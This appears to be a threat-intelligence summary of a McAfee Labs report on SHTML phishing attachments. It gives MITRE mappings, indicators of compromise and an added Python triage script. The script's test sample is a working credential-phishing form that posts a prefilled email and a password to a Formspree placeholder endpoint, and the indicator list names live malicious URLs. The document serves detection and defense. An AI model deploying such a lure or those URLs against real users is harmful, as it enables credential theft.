McAfee Labs reports a new wave of phishing that abuses server-parsed HTML (SHTML) files delivered as email attachments to lure users with blurred-image login forms. The campaign relies on JavaScript inside the SHTML and on back-end form services such as Formspree.io to exfiltrate captured credentials. #SHTMLPhishing #Formspree #McAfeeLabs #DHL
Key points
- Attackers distribute SHTML files as email attachments to phish users.
- SHTML content uses blurred images loaded from legitimate sites to disguise the phishing page.
- Clicking the SHTML attachment shows a fake document with a login page requiring credentials.
- JavaScript in SHTML is used to generate phishing forms, redirect users, or hide malicious URLs.
- Form submission services (e.g., Formspree.io) are abused to forward captured data to attackers.
- Observed IOCs include specific SHTML-related hashes and several malicious URLs as attack indicators.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment - "Attackers victimize users by distributing SHTML files as email attachments."
- [T1059.007] Command and Scripting Interpreter: JavaScript - "Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior."
- [T1056.003] Input Capture: Credentials in Web Forms - When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser: "the user must enter his/her credentials. In some cases, the email address is prefilled."
- [T1567.002] Exfiltration to Web Service - Data from the submitted form is sent to a back-end service (e.g., Formspree) and forwarded to the attacker. "The attackers use the formspree.io URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method. ... data is sent to Formspree.io."
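The technique chain above (a credential form inside an HTML/SHTML attachment, rendered over a remotely loaded image, posting to a third-party form-forwarding service, with inline JavaScript) is easy to triage statically before the attachment ever reaches a browser. The following is an added example written for this summary, not code from McAfee Labs: it parses an attachment, flags the combination of a password field with a form action (or any URL in script text) pointing at a form-forwarding host, and checks the file's MD5 against the hashes listed in the Indicators of Compromise. The sample attachment, the `example.invalid` image host and the `PLACEHOLDER` Formspree form ID are constructed for the demonstration.

```python
"""Static triage of an HTML/SHTML email attachment for the SHTML credential-phishing
pattern: password form + third-party form forwarder + remote image + inline script.
Added example for this summary; not McAfee Labs code."""
import hashlib
import re
from html.parser import HTMLParser

# Hosts of form-forwarding services abused in the reported campaign.
FORM_FORWARDERS = {"formspree.io"}

# MD5 hashes published as IoCs in the report.
IOC_MD5 = {
    "0a072e7443732c7bdb9d1f3fdb9ee27c",
    "3b215a37c728f65c167941e788935677",
    "257c1f7a04c93a44514977ec5027446c",
}

URL_RE = re.compile(r"https?://[^\s\"'()<>]+", re.I)


def host_of(url: str) -> str:
    """Return the lowercase host part of an http(s) URL, or '' if it is not one."""
    m = re.match(r"https?://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


class FormScanner(HTMLParser):
    """Collect form actions, password inputs, remote images and script presence."""

    def __init__(self) -> None:
        super().__init__()
        self.form_actions: list[str] = []
        self.password_fields = 0
        self.remote_images: list[str] = []
        self.has_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes become ''
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "img" and host_of(a.get("src", "")):
            self.remote_images.append(a["src"])
        elif tag == "script":
            self.has_script = True


def triage(content: bytes) -> dict:
    """Return the attachment's MD5, discovered form actions, findings and a verdict."""
    md5 = hashlib.md5(content).hexdigest()
    text = content.decode("utf-8", errors="replace")
    scanner = FormScanner()
    scanner.feed(text)
    # JavaScript-generated forms (per the report) will not show up as <form> tags,
    # so also look for forwarder URLs anywhere in the raw text, including script bodies.
    forwarder_urls = [u for u in scanner.form_actions + URL_RE.findall(text)
                      if host_of(u) in FORM_FORWARDERS]
    findings = []
    if md5 in IOC_MD5:
        findings.append("md5 matches published IoC")
    if scanner.password_fields and forwarder_urls:
        findings.append("password form posts to third-party form-forwarding service")
    if scanner.password_fields and scanner.remote_images:
        findings.append("login form rendered alongside remotely loaded image")
    if scanner.password_fields and scanner.has_script:
        findings.append("inline script alongside credential form")
    return {
        "md5": md5,
        "form_actions": scanner.form_actions,
        "forwarder_urls": sorted(set(forwarder_urls)),
        "findings": findings,
        "verdict": "suspicious" if findings else "clean",
    }


# Constructed sample attachment mimicking the reported lure (not a real campaign file).
SAMPLE_SHTML = b"""<!--#echo var="DATE_LOCAL" -->
<html><body>
<img src="https://example.invalid/blurred-invoice.png">
<form method="POST" action="https://formspree.io/f/PLACEHOLDER">
  <input type="email" name="email" value="victim@example.invalid">
  <input type="password" name="password">
  <button>Sign in</button>
</form>
<script>document.forms[0].email.value = "victim@example.invalid";</script>
</body></html>"""

BENIGN_HTML = b"<html><body><p>Quarterly newsletter</p></body></html>"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_SHTML), ("benign", BENIGN_HTML)):
        print(name, triage(blob)["verdict"])
```

Run it against a mail gateway's quarantined `.shtml`/`.html` attachments; a password field whose submit target is a hosted form service is rarely legitimate in an attachment and is a strong trigger for quarantine, while the hash match alone only catches the three samples already published.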
Indicators of Compromise
- [URL] formspree.io/f/xjvderkn, cianindustries[.]com/error/excel.php, twenty88[.]com/mincs/mea.ph, sweet.classicbo[.]com/mailb_fixpd.ph
- [URL] https://isc.sans.edu, https://i.gyazo.com
- [Hash] 0a072e7443732c7bdb9d1f3fdb9ee27c (shtml(Adobe) - Total Protection and LiveSafe)
- [Hash] 3b215a37c728f65c167941e788935677 (shtml(Excel) - Total Protection and LiveSafe)
- [Hash] 257c1f7a04c93a44514977ec5027446c (shtml(DHL) - Total Protection and LiveSafe)
Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/